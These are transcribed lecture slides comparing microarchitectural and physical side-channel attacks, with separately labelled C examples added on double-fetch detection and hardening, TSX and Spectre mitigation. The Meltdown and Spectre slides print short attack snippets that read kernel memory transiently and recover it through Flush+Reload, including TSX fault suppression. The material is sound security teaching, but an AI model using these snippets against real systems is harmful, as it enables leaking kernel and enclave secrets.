(Why) Are Microarchitectural Attacks Really
Different than Physical Side-Channel Attacks?
Daniel Gruss
September 10, 2018
Graz University of Technology
1 Daniel Gruss — Graz University of Technology
Stealing Bitcoins? www.tugraz.at
SGX
SGX
[Diagram labels: Application (Untrusted part, Trusted part), Operating System; Create Enclave, Call Trusted Fnc., Call Gate, Trusted Fnc., Return, . . .]
Intel SGX Developer Guide
Protection from Side-Channel Attacks
Intel SGX does not provide explicit protection from side-channel attacks. It is the
enclave developer’s responsibility to address side-channel attack concerns.
SGX Wallets
• Ledger SGX Enclave for blockchain applications
• BitPay Copay Bitcoin wallet
• Teechain payment channel using SGX
Teechain
[...] We assume the TEE guarantees to hold and do not
consider side-channel attacks [5, 35, 46] on the TEE. Such
attacks and their mitigations [36, 43] are outside the scope of
this work. [...]
Attacking a weak RSA implementation inside SGX
Raw Prime+Probe trace...¹
...processed with a simple moving average...
...allows to clearly see the bits of the exponent
1 1 1 00 1 1 1 01 1 1 00000001 000 1 0 1 00 1 1 00 1 1 01 1 1 1 1 0 1 1 1 1 0 1 000 1 00 1 1 1 0 1 000 1 1 1 0000 1 1 1
¹ Michael Schwarz et al. Malware Guard Extension: Using SGX to Conceal Cache Attacks. In: DIMVA. 2017.
Physical Side Channels
• Power consumption [KJJ99; MOP08]
• Electro-magnetic radiation [RR01; KS09]
• Temperature [HS13]
• Photonic emission [Sch+12; CSW17]
• Acoustic emissions [Bac+10]
→ Physical access usually relevant, but code execution on device
usually not relevant
Microarchitectural Attacks
[Timeline figure with the years 1996, 2004, 2006, 2009, 2011, 2013, 2014, 2015, 2016, 2017, 2018]
Differences and Similarities
• threat model
• temporal component
• observer effect (destructive measurements)
• spatial component
Microarchitectural Attacks - Threat Model
• Usually no physical access
• Local code
• Co-located code
• Different meanings of “remote”
1. Attacker controls code in browser sandbox (e.g., [Ore+15;
GMM16])
2. Attacker cannot control any code on the system
Truly remote attacks...
Just a few examples:
• Remote timing attacks on crypto ([Ber04; BB05] and many more)
• ThrowHammer [Tat+18] and NetHammer [Lip+17]
• NetSpectre [Sch+18b]
CPU Cache
Flush+Reload
Temporal Component: Timestamps
Physical Side Channels
• theoretical maximum accuracy of $5.4 \cdot 10^{-44}$ s
• feasible today: $850 \cdot 10^{-21}$ s
Microarchitectural Attacks
• often around nanoseconds
• sometimes much lower
Temporal Component: Sampling Rate
Physical Side Channels
• in the range of multiple GHz
Microarchitectural Attacks
• usually varying frequency (depending on the attack)
• between a few ns (< 1 GHz) and multiple seconds (< 1 Hz) (or even worse)
• strongly dependent on the specific attack
• device under test = measurement device
• observer effect
Microarchitectural Observer Effect
device under test = measurement device
• measuring time takes some time
• limits the resolution
• measuring cache hits/misses manipulates the cache state
• virtually all measurements are destructive
Measurement Noise
Flush+Reload has no noise except for:
• Race condition between attacker and victim (observer effect)
• Speculative execution
• Prefetching
• ...
→ Typically > 99.99% precision and recall
Measuring Processor Operations
Timing Measurements
• Very short timings
• rdtsc instruction: “cycle-accurate” timestamps
    [...]
    rdtsc
    function()
    rdtsc
    [...]
What are we measuring?
• Do you measure what you think you measure?
• Out-of-order execution → what is really executed
    rdtsc
    function()
    [...]
    rdtsc

    rdtsc
    [...]
    rdtsc
    function()

    rdtsc
    rdtsc
    function()
    [...]
Accurate Microarchitecture Timing
• use pseudo-serializing instruction rdtscp (recent CPUs)
• and/or use serializing instructions like cpuid
• and/or use fences like mfence
Intel, How to Benchmark Code Execution Times on Intel IA-32 and IA-64 Instruction Set Architectures, White Paper, December 2010.
Memory Access Latency
[Figure: histogram of the number of accesses (log scale, 10^1 to 10^7) over access time in CPU cycles (50 to 400), for cache hits and cache misses]
Temporal Component
• Flush+Reload had beautifully nice timings, right?
• Well... steps of 2-4 cycles
• only 35-70 steps between hits and misses
• On some devices only 1-2 steps!

Timer
• We can build our own timer [Lip+16; Sch+17]
• Start a thread that continuously increments a global variable
• The global variable is our timestamp

Self-built Timer
CPU cycles one increment takes:
• rdtsc: 3
timestamp = rdtsc();
• C: 4.7
while (1) {
  timestamp++;
}
• Assembly: 4.67
mov &timestamp, %rcx
1: incl (%rcx)
jmp 1b
• Optimized: 0.87
mov &timestamp, %rcx
1: inc %rax
mov %rax, (%rcx)
jmp 1b

Out-of-Order Execution
[Figure: CPU pipeline block diagram. Frontend: L1 Instruction Cache, ITLB, Branch Predictor, Instruction Fetch & PreDecode, Instruction Queue, 4-Way Decode, µOP Cache, MUX, Allocation Queue. Execution Engine: Reorder buffer, Scheduler, Execution Units (ALU, AES, ...; ALU, FMA, ...; ALU, Vect, ...; ALU, Branch; Load data; Load data; Store data; AGU), CDB. Memory Subsystem: Load Buffer, Store Buffer, L1 Data Cache, DTLB, STLB, L2 Cache]
Instructions are
• fetched and decoded in the front-end
• dispatched to the backend
• processed by individual execution units

Temporal Component
• trace over time contains information
• single spikes contain information
• can’t arbitrarily improve clock
• microarchitectural attacks somewhat similar to SPA
→ single spike can already reveal a secret

Case Study: Double Fetches
• “time-of-check-to-time-of-use”
• Caused by accessing the shared memory twice
• Double-fetch bugs = exploitable double fetches
• Can microarchitectural attacks help here?

A Double Fetch
[Figure: the buffer string holds "/path/file\0payload\0"; after Thread 2's write it holds "/path/fileXpayload\0"; a span of the buffer is labelled "length"]
Thread 1
strcpy(string, "/path/file\0payload");
open(string, O_CREAT);
// <switch to kernel>
int len = strlen(string);
char* local = malloc(len + 1);
strcpy(local, string);
// <memory corruption>
Thread 2 (schedule: runs after the malloc and before the second strcpy)
string[10] = 'X';

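The double fetch on this slide next to a single-fetch version, as an added C example (not code from the talk or from DECAF). The names `race_hook`, `double_fetch_overrun` and `snapshot_string` are hypothetical, the hook stands in for the scheduling of Thread 2, and the vulnerable variant only reports how far the second `strcpy` would overrun instead of performing the copy.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical hook standing in for "schedule" on the slide: it runs between
 * two reads of the shared buffer, which makes the race deterministic. */
typedef void (*race_hook)(char *shared);

/* Constructed copy of the slide's buffer: "/path/file\0payload\0", zero padded. */
static void fill_slide_buffer(char buf[32])
{
    static const char init[] = "/path/file\0payload";
    memset(buf, 0, 32);
    memcpy(buf, init, sizeof init);
}

/* Thread 2 from the slide: overwrite the terminator at index 10. */
static void flip_terminator(char *shared) { shared[10] = 'X'; }

/* The slide's pattern: the allocation size comes from one read of the shared
 * string, the copy from a second read. Returns how many bytes the second
 * strcpy would write past the allocation (0 means the copy fits). */
size_t double_fetch_overrun(char *shared, race_hook hook)
{
    size_t len = strlen(shared);          /* fetch 1: decides malloc(len + 1) */
    size_t allocated = len + 1;
    if (hook) hook(shared);               /* the other thread runs here */
    size_t needed = strlen(shared) + 1;   /* fetch 2: what strcpy would copy */
    return needed > allocated ? needed - allocated : 0;
}

/* Hardened form: every shared byte is read exactly once into a bounded
 * private buffer, and all later checks use that snapshot. Returns NULL when
 * no terminator is found within max bytes or when allocation fails. */
char *snapshot_string(const volatile char *shared, size_t max, size_t *out_len)
{
    char *local = malloc(max + 1);
    if (!local) return NULL;
    for (size_t i = 0; i < max; i++) {
        char c = shared[i];               /* the only read of this byte */
        local[i] = c;
        if (c == '\0') { *out_len = i; return local; }
    }
    free(local);                          /* unterminated within max: reject */
    return NULL;
}

/* Overrun in bytes for the slide's buffer, with or without the race. */
size_t demo_overrun(int with_race)
{
    char shared[32];
    fill_slide_buffer(shared);
    return double_fetch_overrun(shared, with_race ? flip_terminator : NULL);
}

/* 1 if a snapshot taken before the write still holds "/path/file". */
int demo_snapshot_survives(void)
{
    char shared[32];
    size_t len = 0;
    int ok;
    fill_slide_buffer(shared);
    char *local = snapshot_string(shared, sizeof shared, &len);
    if (!local) return 0;
    flip_terminator(shared);              /* race happens after the snapshot */
    ok = (len == 10 && strcmp(local, "/path/file") == 0);
    free(local);
    return ok;
}

/* 1 if a string longer than the limit is rejected instead of truncated. */
int demo_rejects_unterminated(void)
{
    char shared[32];
    size_t len = 0;
    fill_slide_buffer(shared);
    flip_terminator(shared);              /* 18 characters before the '\0' */
    char *local = snapshot_string(shared, 16, &len);
    if (local) { free(local); return 0; }
    return 1;
}

int main(void)
{
    printf("overrun without race: %zu bytes\n", demo_overrun(0));
    printf("overrun with race:    %zu bytes\n", demo_overrun(1));
    printf("snapshot survives:    %d\n", demo_snapshot_survives());
    printf("over-long rejected:   %d\n", demo_rejects_unterminated());
    return 0;
}
```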
Microarchitectural Attacks to the Rescue!
• Idea: memory access can be observed through the cache
• Observe cache activity using a cache attack

DECAF⁴
[Figure: DECAF workflow diagram with the stages (Syscall) Fuzzer, Detect double fetches, Double fetch candidates, Exploit double fetch, Report general bug, Report double-fetch bug, Fix double-fetch bug]
⁴ Michael Schwarz et al. Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs using Modern CPU Features. In: AsiaCCS (2018).

Detection via Flush+Reload
[Figure: access time [cycles] (200 to 260) over runtime [cycles] (0.1 to 1.1 ·10^6), annotated "Data was accessed"]
[Figure: access time [cycles] (200 to 260) over runtime [cycles] (0.1 to 1 ·10^6), annotated "First access" and "Second access"]

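One way to turn a Flush+Reload trace like the ones plotted on these slides into a double-fetch candidate decision, as an added C example (not DECAF's code). The calibration values, the trace and the names `calibrate_threshold`, `analyze_window` and `is_double_fetch_candidate` are constructed for illustration; a probe counts as a hit when its access time is below the calibrated threshold.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* One Flush+Reload probe: when it ran and how long the reload took (cycles). */
struct sample { uint64_t runtime; unsigned access_time; };

/* Constructed calibration runs: reloads of a cached and of a flushed line. */
static const unsigned CAL_HITS[]     = { 204, 208, 212, 206 };
static const unsigned CAL_MISSES[]   = { 244, 250, 258, 247 };
/* Constructed overlap case: a timer too coarse to separate the two classes. */
static const unsigned OVERLAP_HITS[] = { 204, 250 };

/* Constructed trace of one syscall: two probes see the line cached. */
enum { TRACE_LEN = 10 };
static const struct sample TRACE[TRACE_LEN] = {
    { 100000, 250 }, { 200000, 248 }, { 300000, 252 }, { 400000, 209 },
    { 500000, 251 }, { 600000, 249 }, { 700000, 207 }, { 800000, 253 },
    { 900000, 250 }, { 1000000, 247 },
};

/* Midpoint between the slowest known hit and the fastest known miss.
 * Returns 0 when the two classes overlap, i.e. the timer resolution is not
 * good enough to tell hits from misses and the trace must not be trusted. */
unsigned calibrate_threshold(const unsigned *hits, size_t nh,
                             const unsigned *misses, size_t nm)
{
    if (nh == 0 || nm == 0) return 0;
    unsigned max_hit = hits[0], min_miss = misses[0];
    for (size_t i = 1; i < nh; i++)
        if (hits[i] > max_hit) max_hit = hits[i];
    for (size_t i = 1; i < nm; i++)
        if (misses[i] < min_miss) min_miss = misses[i];
    if (max_hit >= min_miss) return 0;
    return max_hit + (min_miss - max_hit) / 2;
}

struct fetch_report {
    size_t accesses;   /* probes in the window that came back as hits */
    uint64_t first;    /* runtime of the first hit, 0 if none */
    uint64_t second;   /* runtime of the second hit, 0 if none */
};

/* Count the hits inside [start, end), the window of one syscall. With a
 * threshold of 0 (failed calibration) nothing is ever counted as a hit. */
struct fetch_report analyze_window(const struct sample *t, size_t n,
                                   unsigned threshold,
                                   uint64_t start, uint64_t end)
{
    struct fetch_report r = { 0, 0, 0 };
    for (size_t i = 0; i < n; i++) {
        if (t[i].runtime < start || t[i].runtime >= end) continue;
        if (t[i].access_time >= threshold) continue;  /* miss: not touched */
        if (r.accesses == 0) r.first = t[i].runtime;
        else if (r.accesses == 1) r.second = t[i].runtime;
        r.accesses++;
    }
    return r;
}

/* Two or more accesses to the same user memory within one syscall. */
int is_double_fetch_candidate(struct fetch_report r)
{
    return r.accesses >= 2;
}

int main(void)
{
    unsigned thr = calibrate_threshold(CAL_HITS, 4, CAL_MISSES, 4);
    struct fetch_report r = analyze_window(TRACE, TRACE_LEN, thr, 100000, 1000001);
    printf("threshold: %u cycles\n", thr);
    printf("accesses: %zu (first at %llu, second at %llu)\n", r.accesses,
           (unsigned long long)r.first, (unsigned long long)r.second);
    printf("double-fetch candidate: %s\n",
           is_double_fetch_candidate(r) ? "yes" : "no");
    printf("overlapping calibration gives threshold %u\n",
           calibrate_threshold(OVERLAP_HITS, 2, CAL_MISSES, 4));
    return 0;
}
```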
Double-fetch Bug Exploitation
• Only double-fetch bugs are interesting
→ exploit while fuzzing
• Flip value as fast as possible?
• Better use a trigger (just like in physical fault attacks!)

Cache-based Trigger www.tugraz.at
3 3.5 4 4.5 5 5.5 6 6.5 7
·105
200
220
240
260
Runtime [cycles]
Acc
ess
tim
e
[cyc
les]
37 Daniel Gruss — Graz University of Technology
![Page 188: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/188.jpg)
Cache-based Trigger www.tugraz.at
3 3.5 4 4.5 5 5.5 6 6.5 7
·105
200
220
240
260
Runtime [cycles]
Acc
ess
tim
e
[cyc
les]
First access
37 Daniel Gruss — Graz University of Technology
![Page 189: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/189.jpg)
Cache-based Trigger www.tugraz.at
3 3.5 4 4.5 5 5.5 6 6.5 7
·105
200
220
240
260
Runtime [cycles]
Acc
ess
tim
e
[cyc
les]
First access Modify value
37 Daniel Gruss — Graz University of Technology
![Page 190: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/190.jpg)

Cache-based Trigger
[Figure: access time [cycles] (y-axis, 200 to 260) over runtime [cycles] (x-axis, 3 to 7 ·10^5); marked events: first access, modify value, second access with modified value]

Cache-based Trigger
[Figure: probability [%] (y-axis, 0 to 100) over access delta [cycles] (x-axis, 0 to 600); series: Flush+Reload, Flipping]

Cache-based Trigger
[Figure: probability [%] (y-axis, 0 to 100) over number of checks (x-axis, 1 to 4); series: Flush+Reload, Flipping]

Getting rid of Double Fetch Bugs
• Problem: modified value → exploit
• Idea: Ensure that both accesses are atomic
  → Another microarchitectural feature: Intel TSX

Hardware Transactional Memory
• Make a sequence of reads and writes atomic
• Operations are wrapped in a transaction
• Conflicts → transaction is rolled back
• Implemented via the cache
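
Transactional Memory
[Diagram: columns Thread 0, Thread 1 and Cache. One thread executes xbegin, mov instructions and xend, with the else path of xbegin; the other thread executes mov instructions. The cache holds the data and a read set; reads add the data to the read set, and a write to that data leads to a transactional abort. Annotations: first access, second access, modification, exploit detected.]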
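
The idea from the slides above, written out as an added example (not code from the talk): the check and the use of a length field are two separate fetches, and the protected variant runs both inside one Intel TSX (RTM) transaction so that a conflicting write aborts and rolls back the transaction. The struct `shared_msg`, the function names, `MAX_LEN`, the retry count, the `flip_len` hook and the single-fetch fallback for CPUs without RTM are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>

#if defined(__x86_64__) || defined(__i386__)
#include <cpuid.h>
#include <immintrin.h>
#define HAVE_X86 1
#else
#define HAVE_X86 0
#endif

#define MAX_LEN 64      /* capacity of the privileged-side buffer */
#define TSX_RETRIES 8   /* transactions may also abort spuriously */

/* Hypothetical message in memory that the untrusted side can still write. */
struct shared_msg {
    volatile uint32_t len;   /* volatile: every read is a real fetch */
    uint8_t payload[256];
};

/* Constructed stand-in for a racing thread, called between the two fetches. */
typedef void (*race_hook)(struct shared_msg *);
void flip_len(struct shared_msg *m) { m->len = 200; }

/* Double-fetch pattern: len is fetched for the check and again for the use.
 * Returns the length the copy would use (nothing is copied here, so the
 * demonstration never writes out of bounds) or -1 if the check rejects it. */
long double_fetch_len(struct shared_msg *m, race_hook between)
{
    if (m->len > MAX_LEN)        /* first fetch: bounds check */
        return -1;
    if (between)
        between(m);              /* window in which the value can change */
    return (long)m->len;         /* second fetch: value actually used */
}

static int cpu_has_rtm(void)
{
#if HAVE_X86
    unsigned a = 0, b = 0, c = 0, d = 0;
    if (__get_cpuid_max(0, NULL) >= 7) {
        __cpuid_count(7, 0, a, b, c, d);
        return (int)((b >> 11) & 1);   /* CPUID.(EAX=7,ECX=0):EBX[11] = RTM */
    }
#endif
    return 0;
}

#if HAVE_X86
/* Both fetches and the copy run inside one RTM transaction. len's cache line
 * joins the read set on the first fetch; a write to it from another core
 * before xend aborts the transaction and discards everything done so far.
 * Returns 1 and stores the result in *n on commit, 0 if every attempt aborted. */
__attribute__((target("rtm")))
static int copy_in_transaction(struct shared_msg *m, uint8_t *out, long *n)
{
    for (int attempt = 0; attempt < TSX_RETRIES; attempt++) {
        if (_xbegin() == _XBEGIN_STARTED) {
            long r = -1;
            if (m->len <= MAX_LEN) {           /* first fetch */
                r = (long)m->len;              /* second fetch */
                for (long i = 0; i < r; i++)
                    out[i] = m->payload[i];
            }
            _xend();                           /* commit: no conflict seen */
            *n = r;
            return 1;
        }
        /* else path of xbegin: aborted (conflict or spurious), so retry */
    }
    return 0;
}
#endif

/* Copies the message into out (at least MAX_LEN bytes); returns the number
 * of bytes copied or -1 if len exceeds MAX_LEN. */
long copy_msg_protected(struct shared_msg *m, uint8_t *out)
{
#if HAVE_X86
    long n = -1;
    if (cpu_has_rtm() && copy_in_transaction(m, out, &n))
        return n;
#endif
    /* Fallback (assumption of this example): fetch len once, use the snapshot. */
    uint32_t snap = m->len;
    if (snap > MAX_LEN)
        return -1;
    for (uint32_t i = 0; i < snap; i++)
        out[i] = m->payload[i];
    return (long)snap;
}
```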

Microarchitectural Defenses
• device under test = measurement device
  → software defenses are possible
• e.g., make sure attacker can’t compute in parallel to victim
• how would that work in the physical world?

Spatial Component
• physical: different offsets on the chip
• microarchitectural:
  • different microarchitectural elements
  • more significant: huge virtual address space
  • 2^48 different virtual memory locations
  • the location is often (part of) the secret
Cache Template Attack Demo

Cache Template⁵
[Figure: cache template matrix; x-axis: key (g to z), y-axis: address (0x7c680 to 0x7cd00)]
⁵ Daniel Gruss et al. Cache Template Attacks: Automating Attacks on Inclusive Last-Level Caches. In: USENIX Security Symposium. 2015.
Side-Channel Attacks and Fault Attacks?

Attack Categories
Physical
• Side-channel attacks
• Fault attacks
• What about cold boot attacks? [Hal+09]
Microarchitectural
• Side-channel attacks
• Fault attacks
• What about Meltdown/Spectre? [Lip+18; Koc+19]

Out-of-order state does not become architecturally visible
but ...

Building Meltdown
*(volatile char*) 0;
array[84 * 4096] = 0;

Building Meltdown
• Flush+Reload over all pages of the array
[Figure: access time [cycles] (y-axis, 300 to 500) over page (x-axis, 0 to 250)]
• “Unreachable” code line was actually executed
• Exception was only thrown afterwards

Building Meltdown
• Out-of-order instructions leave microarchitectural traces
• We can see them for example through the cache
• Give such instructions a name: transient instructions
• We can indirectly observe the execution of transient instructions
Building Meltdown
• Add another layer of indirection to test
```c
char data = *(char*) 0xffffffff81a000e0;
array[data * 4096] = 0;
```
• Then check whether any part of array is cached

Building Meltdown
• Flush+Reload over all pages of the array
[Figure: access time per page; x-axis "Page" (ticks 0 to 250), y-axis "Access time [cycles]" (ticks 300 to 500)]
• Index of cache hit reveals data
• Permission check is in some cases not fast enough

Details: Exception Handling
• Basic Meltdown code leads to a crash (segfault)
• How to prevent the crash?
Fault Handling / Fault Suppression / Fault Prevention

Meltdown with Fault Suppression
• Intel TSX to suppress exceptions instead of signal handler
```c
if (xbegin() == XBEGIN_STARTED) {
    char secret = *(char*) 0xffffffff81a000e0;
    array[secret * 4096] = 0;
    xend();
}
for (size_t i = 0; i < 256; i++) {
    if (flush_and_reload(array + i * 4096) == CACHE_HIT) {
        printf("%c\n", i);
    }
}
```

Meltdown with Fault Prevention
• Speculative execution to prevent exceptions
```c
int speculate = rand() % 2;
size_t address = (0xffffffff81a000e0 * speculate) +
                 ((size_t)&zero * (1 - speculate));
if (!speculate) {
    char secret = *(char*) address;
    array[secret * 4096] = 0;
}
for (size_t i = 0; i < 256; i++) {
    if (flush_and_reload(array + i * 4096) == CACHE_HIT) {
        printf("%c\n", i);
    }
}
```

Foreshadow / Foreshadow-NG⁶ [Van+18; Wei+18]
⁶ Jo Van Bulck et al. Foreshadow: Extracting the Keys to the Intel SGX Kingdom with Transient Out-of-Order Execution. In: USENIX Security Symposium. 2018.

L1TF/Foreshadow Demo

Spectre v1
[Animation: a branch diagram. The condition if (index < 4) leads via "then" to LUT[data[index] * 4096] and via "else" to 0, with char* data = "textKEY"; and a "Prediction" box between the two paths. The frames step index from 0 to 6. Every value of index has a frame labelled "Speculate"; index = 0, 4, 5 and 6 also have a frame labelled "Execute".]
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead

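The bounds check from the Spectre v1 slide, next to a hardened form that clamps the index with arithmetic instead of relying on the predicted branch. This is an added example, not code from the talk; the function names, PUBLIC_LEN and the GCC/Clang inline-asm barrier are assumptions of the example.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PAGE       4096
#define PUBLIC_LEN 4    /* assumption: only "text" is public, "KEY" is secret */

static const char *data = "textKEY";      /* string from the slide */
static volatile uint8_t LUT[256 * PAGE];  /* lookup table from the slide */

/* The slide's pattern. The bounds check is a conditional branch, so a
 * mispredicting CPU can transiently run the body with index >= PUBLIC_LEN.
 * Returns the LUT page touched architecturally, or -1 if rejected. */
int lookup_unsafe(size_t index)
{
    if (index < PUBLIC_LEN) {
        size_t page = (unsigned char)data[index];
        (void)LUT[page * PAGE];
        return (int)page;
    }
    return -1;
}

/* All-ones if index < size, zero otherwise, computed without a branch.
 * The top bit of (index | (size - 1 - index)) is set exactly when
 * index >= size; this holds for size <= SIZE_MAX / 2 + 1. */
size_t index_mask_nospec(size_t index, size_t size)
{
    /* Assumption: GCC/Clang. The empty asm hides the value of index from
     * the optimizer so it cannot fold the mask to a constant using the
     * range it learned from the caller's bounds check. */
    __asm__ volatile("" : "+r"(index));
    size_t oob = (index | (size - 1 - index)) >> (sizeof(size_t) * CHAR_BIT - 1);
    return oob - 1;   /* oob == 1 gives 0, oob == 0 gives all-ones */
}

/* In-bounds indices pass through; out-of-bounds indices become 0. */
size_t clamp_index_nospec(size_t index, size_t size)
{
    return index & index_mask_nospec(index, size);
}

/* Hardened form: the load address depends on the clamped index, a data
 * dependency rather than a prediction, so even on a mispredicted path
 * the load can only reach data[0..PUBLIC_LEN-1]. */
int lookup_hardened(size_t index)
{
    if (index < PUBLIC_LEN) {
        index = clamp_index_nospec(index, PUBLIC_LEN);
        size_t page = (unsigned char)data[index];
        (void)LUT[page * PAGE];
        return (int)page;
    }
    return -1;
}

int main(void)
{
    /* Same index sequence as the slide animation: 0 to 6. */
    for (size_t i = 0; i < 7; i++)
        printf("index=%zu mask=%#zx clamped=%zu result=%d\n",
               i, index_mask_nospec(i, PUBLIC_LEN),
               clamp_index_nospec(i, PUBLIC_LEN), lookup_hardened(i));
    return 0;
}
```

Both functions return the same architectural results; the difference only exists on the mispredicted path, which is why the clamp has to be reviewed in the generated assembly rather than confirmed by functional tests alone.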
Spectre v2
[Animation: the indirect call a->move() has two targets, fly() leading to LUT[data[a->m] * 4096] and swim() leading to 0, with a "Prediction" box holding the predicted target. With Animal* a = bird; the prediction starts as swim() and reads fly() after the frame labelled "Execute". With Animal* a = fish; the frame labelled "Speculate" still shows the prediction fly(); after the frame labelled "Execute" it reads swim().]
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return

![Page 303: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/303.jpg)
“Speculative Buffer Overflows” [7]
• v1.1: Speculatively write to memory locations
→ Many more gadgets than previously anticipated
• v1.2: Ignore writable bit
→ not really Spectre but a Meltdown variant
[7] Vladimir Kiriansky et al. Speculative Buffer Overflows: Attacks and Defenses. In: arXiv:1807.03757 (2018).
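An added example (not from the slides or the cited paper) of hardening a bounds-checked store against the v1.1 pattern with branchless index masking, the same arithmetic idea as the Linux kernel's generic array_index_mask_nospec(), here written with unsigned shifts. The table, its size and all function names are constructed for illustration.

```c
#include <limits.h>
#include <stdio.h>

#define TABLE_LEN 16UL /* constructed size for this example */

unsigned char table[TABLE_LEN];

/* All-ones when index < size, zero otherwise, computed without a branch,
 * so the result does not depend on any prediction.
 * Assumes size <= LONG_MAX. */
unsigned long index_mask(unsigned long index, unsigned long size)
{
    /* Hide the value from the optimizer so it cannot fold the mask away
     * using the earlier bounds check (GCC/Clang inline asm). */
    __asm__ volatile("" : "+r"(index));
    /* The top bit of t is set exactly when index >= size. */
    unsigned long t = index | (size - 1UL - index);
    return (t >> (sizeof(t) * CHAR_BIT - 1)) - 1UL;
}

/* Before: architecturally correct, but if the bounds check is
 * mispredicted the store can execute transiently with an
 * out-of-range idx (the v1.1 pattern). */
int store_checked(unsigned long idx, unsigned char v)
{
    if (idx >= TABLE_LEN)
        return -1;
    table[idx] = v;
    return 0;
}

/* After: the store address depends on the mask, so even on a
 * mispredicted path idx is forced to 0 and the transient store
 * stays inside table. */
int store_hardened(unsigned long idx, unsigned char v)
{
    if (idx >= TABLE_LEN)
        return -1;
    idx &= index_mask(idx, TABLE_LEN);
    table[idx] = v;
    return 0;
}

int main(void)
{
    printf("checked  in range: %d\n", store_checked(2, 0x41));
    printf("hardened in range: %d\n", store_hardened(3, 0x41));
    printf("hardened rejected: %d\n", store_hardened(TABLE_LEN, 0x41));
    printf("mask(15) = %lx, mask(16) = %lx\n",
           index_mask(15, TABLE_LEN), index_mask(16, TABLE_LEN));
    return 0;
}
```

The masking only constrains where the transient store can land; it does not stop the misprediction itself, which is why it is applied per access.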
Meltdown vs. Spectre
Meltdown attacks
• Meltdown, LazyFP (v3.1), Foreshadow, Foreshadow-NG, ...
• Out-of-Order Execution
• no prediction required
→ melt down isolation by ignoring access permissions (e.g., page table bits)
• practical mitigation in software (e.g., KAISER)
Spectre attacks
• v1, v1.1, v2, v4, SpectreRSB (v5)
• Speculative Execution ⊂ Out-of-Order Execution
• fundamentally rely on prediction
• difficult to mitigate because it does not violate access permissions
• ...
• ...
Conclusion
• large-scale attacks due to different threat model
• overlap could be leveraged to gain more complete picture
• space for promising mitigations (due to inherent restrictions for the attacker)
I forgot the “Who am I” slide!!1
I’m building up a group @ Graz University of Technology
→ looking for PhD students!
References
Michael Backes et al. Acoustic Side-Channel Attacks on Printers. In: USENIX Security. 2010.
David Brumley et al. Remote timing attacks are practical. In: Computer Networks 48.5 (2005), pp. 701–716.
Daniel J. Bernstein. Cache-Timing Attacks on AES. 2004. url: http://cr.yp.to/antiforgery/cachetiming-20050414.pdf.
Elad Carmon et al. Photonic Side Channel Attacks Against RSA. In: HOST’17. 2017.
Daniel Gruss et al. Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript. In: DIMVA. 2016.
Daniel Gruss et al. Cache Template Attacks: Automating Attacks on Inclusive Last-Level Caches. In: USENIX Security Symposium. 2015.
J. Alex Halderman et al. Lest we remember: cold-boot attacks on encryption keys. In: Communications of the ACM (May 2009).
Michael Hutter et al. The temperature side channel and heating fault attacks. In: International Conference on Smart Card Research and Advanced Applications. Springer. 2013, pp. 219–235.
Paul Kocher et al. Differential power analysis. In: Annual International Cryptology Conference. Springer. 1999, pp. 388–397.
Paul Kocher et al. Spectre Attacks: Exploiting Speculative Execution. In: S&P. 2019.
Emilia Kasper et al. Faster and Timing-Attack Resistant AES-GCM. In: Cryptographic Hardware and Embedded Systems (CHES). 2009, pp. 1–17.
Vladimir Kiriansky et al. Speculative Buffer Overflows: Attacks and Defenses. In: arXiv:1807.03757 (2018).
Moritz Lipp et al. ARMageddon: Cache Attacks on Mobile Devices. In: USENIX Security Symposium. 2016.
Moritz Lipp et al. Nethammer: Inducing Rowhammer Faults through Network Requests. In: arXiv:1711.08002 (2017).
Moritz Lipp et al. Meltdown: Reading Kernel Memory from User Space. In: USENIX Security Symposium. 2018.
Stefan Mangard et al. Power analysis attacks: Revealing the secrets of smart cards. Vol. 31. Springer Science & Business Media, 2008.
Yossef Oren et al. The Spy in the Sandbox: Practical Cache Attacks in JavaScript and their Implications. In: CCS. 2015.
Josyula R Rao et al. EMpowering Side-Channel Attacks. In: IACR Cryptology ePrint Archive 2001 (2001), p. 37.
Alexander Schlosser et al. Simple Photonic Emission Analysis of AES. In: CHES’12. 2012.
Michael Schwarz et al. Malware Guard Extension: Using SGX to Conceal Cache Attacks. In: DIMVA. 2017.
Michael Schwarz et al. Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs using Modern CPU Features. In: AsiaCCS (2018).
Michael Schwarz et al. NetSpectre: Read Arbitrary Memory over Network. In: arXiv:1807.10535 (2018).
Andrei Tatar et al. Throwhammer: Rowhammer Attacks over the Network and Defenses. In: USENIX ATC. 2018.
Jo Van Bulck et al. Foreshadow: Extracting the Keys to the Intel SGX Kingdom with Transient Out-of-Order Execution. In: USENIX Security Symposium. 2018.
Ofir Weisse et al. Foreshadow-NG: Breaking the Virtual Memory Abstraction with Transient Out-of-Order Execution. In: Technical report (2018).